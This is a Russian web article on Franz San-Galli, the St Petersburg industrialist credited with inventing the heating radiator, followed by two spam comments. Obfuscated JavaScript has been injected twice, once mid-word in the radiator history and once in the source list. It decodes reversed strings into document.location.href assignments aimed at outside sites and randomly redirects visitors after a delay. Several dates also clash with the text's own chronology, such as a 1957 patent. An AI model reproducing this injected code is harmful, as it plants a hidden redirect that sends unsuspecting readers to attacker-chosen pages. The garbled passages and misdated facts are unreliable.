Россия “Вперёд”!

А знаете ли вы, что батареи отопления изобрел наш соотечественник – Франц Карлович (Франц-Фридрих-Вильгельм)  Сан-Галли. Его дедом был итальянец, отцом – немец, а родился он в 1824 году, в нынешнем польском городе Камень-Поморский,  в те времена – прусском Каммин. Российским подданным Франц Карлович стал в свои 27 лет, после 8 лет жизни в России. В это же время он женился и основал собственное дело. Открыл на Лиговском проспекте мастерскую по производству каминов, умывальников и металлических кроватей, а на Невском проспекте – магазин. Дело совершенно не продвигалось, и молодая семья почти голодала. Однако Франц не останавливался и продолжал свои изобретательские исследования. В частности,  работал над усовершенствованием системы водяного отопления, и вскоре получил первый крупный заказ – ремонт отопительной системы в императорских оранжереях Царского села. Заказ был выполнен успешно, и дела стали налаживаться.

В ходе продолжения изобретательских работ приблизительно между 1855 и 1857 годом, Сан-Галли изобрел принципиально новое для того времени обогревательное устройство — радиатор водяного отопления.  По-немецки он назвал его «хайцкёрпер» (гопячая коробка), а по-русски – батарея. В 1957 год Франц Сан-Галли получил патент на свое изобретение.

Малоизвестный факт в России – то, что примерно в это же время в Англии и США также велись разработки в этом направлении. И англосаксонские источники оспаривают российское первенство в изобретении первых радиаторов отопления. В частности американский изобретатель А. Перкинс (Angier Marsh Perkins)  получил патент еще в 1931 на систему отопления, однако она была слишком массивна для использования в домашних условиях. Спустя десять лет его последователь Дж. Нэсон (Joseph Nason), будущий основатель знаменитой компании “Американские радиаторы” (American Radiatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tor Co.) получил еще несколько патентов. Однако массовое распространение по всему миру получили именно “горячие коробки” Сан-Галли. Возможно и из-за того, что собственное ноу-хау Франц Карлович разрешал воспроизводить совершенно бесплатно и сам продвигал его за рубежом. 

В последующие годы мастерская переросла в чугунолитейный и механический завод. Личным мотто Франца Карловича было “Ohne Hast, ohne Rast” (“Без спешки, без отдыха”), а девизом завода – «Вперед». В 1864 году, действуя себе в убыток, предприниматель выиграл тендер на изготовление металлического потолка, стропил и купольной арматуры сгоревшей церкви Царскосельского дворца. Выполнение заказа такого значения и сложности обеспечило завод рекламой, монаршим благоволением и новыми предложениями. Вскоре рядом с заводом был построен жилой рабочий городок со школой и больницей.

“Мой завод приобрел репутацию, что какую бы кто ни пожелал машину или аппарат, или предмет из неблагородных металлов, — завод может все сделать, и я поддерживал эту репутацию, принимая всякие заказы, как бы трудны они не были», — признавался фабрикант в собственном жизнеописании «Curriculum vitae заводчика и фабриканта Франца Карловича Сан-Галли».

И на самом деле, всё, что могло быть сделано из металла, выпускалось на его заводе:  чугунные скамейки; ворота; скульптуры; чаши; фонтаны; ограды; решетка ворот Зимнего дворца; решетка Таврического сада, решетки и фонари Троицкого моста; отделка входных дверей музея барона Штиглица и даже чугунный операционный стол академика Павлова.

Юрий Анненков. Иллюстрация к первому изданию “Мойдодыра”. 1923

Помимо отопительных систем он устанавливал противопожарные системы и принимал участие в газовом освещении Санкт Петербурга.

Интересный факт, что даже появлению первых общественных туалетов  в Санкт Петербурге, а позднее по всей России мы обязаны Сан-Галли. После смерти знаменитой куртизанки, не имеющей наследников, весь ее немалый капитал поступил в казну столицы. Александр III предложил передать средства сиротским приютам, но городские депутаты, даже говорить не хотели о “грязных” деньгах. История гласит, что император вспылил: “Мне что теперь эти деньги собакам отдать?!”. Вот тут-то Франц Карлович и предложил использовать их по постройку первых общественных туалетов, на манер виденных им за рубежом. Элегантное решение, согласитесь?

В благодарность за качество работы фабрикант получил от императорского дома почетное право ставить на своих изделиях изображение двуглавого орла. Проверьте сами этот факт: оказавшись в Санкт Петербурге, присмотритесь к оградам, трубам и зданиям, и вы найдете надпись Сан Галли. Так сохранились – пусть и не все – результаты многолетних, “не спешных, но без отдыха” усилий Франца Карловича.

Троицкий мост. Санкт-Петербург

В Москве этот выдающийся человек тоже себя увековечил историческим памятником – торговым центром на Кузнецком мосту, после перестройки получившим название Пассаж Сан-Галли. Сейчас это Современный Московский дом художника.

Пассаж Сан-Галли. Москва

Франц Карлович Сан-Галли — российский предприниматель, общественный деятель, действительный статский советник, почетный инженер-технолог, купец 1 гильдии, личный дворянин и гласный Городской думы Санкт-Петербурга умер в 1908 году. Похоронили его на  Тентелевском кладбище. Ни само кладбище, ни могила не сохранились. В 1918 году потомки промышленника потеряли все, имущество было конфисковано на благо партии.

Я фабрикант в России,

Известный всей стране,

Лучших перечисляя,

Вспомнят и обо мне.

Ф. К. Сан-Галли

  (Эпиграф к мемуарам) 

А вы уже читали наш материал про батареи со встроенной СВЧ?

Чугунная СВЧ

 

Источники: А. Калинина, И. Нестерова О чем помнит чугун; Смышляев В.А. “Сан-Галли — человек и завод; tsarselo.ru/yenciklopedija-carskogo-sela. Сан-Галли; $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tors.co.uk”>http://www.reclaimedradiatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tors.co.uk; www.heatinghelp.com

ИзобретенияИсторические личностиКомпанииРоссияСлайдер
Comments (2)
Add Comment
  • mfc-site.ru

    Спорт – это не только способ улучшить свое здоровье. Спорт – это движение вперед. С каждым годом появляются новые виды спорта или совершенствуются старые. С каждым годом на экранах телевизоров появляются новые герои, за подвигами которых мы так неустанно следим. С каждым годом устанавливаются новые рекорды. Конечно, иногда мы видим смешные и нелепые ситуации из жизни спортсменов, но это эти воспоминания будут приятно теплиться в нашей памяти. Сегодня вы можете почитать интересные факты о спорте, которые, возможно, смогут вдохновить вас на новые свершение.

  • Агафа

    Кто такой Штирлиц, зачем он спасал радистку Кэт и что от него хотел Мюллер? Если вы помните, тогда этот тест для вас!